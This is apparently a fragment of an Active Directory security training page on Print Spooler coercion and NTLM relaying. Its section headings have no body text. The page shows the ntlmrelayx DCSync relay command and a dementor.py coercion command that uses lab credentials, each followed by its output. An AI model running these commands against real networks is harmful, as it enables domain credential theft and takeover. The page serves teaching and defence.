Print Spooler & NTLM Relaying
Description
Impact
Attack Methodology
Step-by-Step Attack Execution
impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2supportImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Protocol Client SMTP loaded.. [*] Protocol Client LDAP loaded.. ... [*] Servers started, waiting for connectionspython3 ./dementor.py 172.16.18.20 172.16.18.3 -u bob -d eagle.local -p Slavi123[*] connecting to 172.16.18.3 [*] bound to spoolss [*] getting context handle... ... [-] exception RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
Prevention
Detection
Honeypot Strategy
Last updated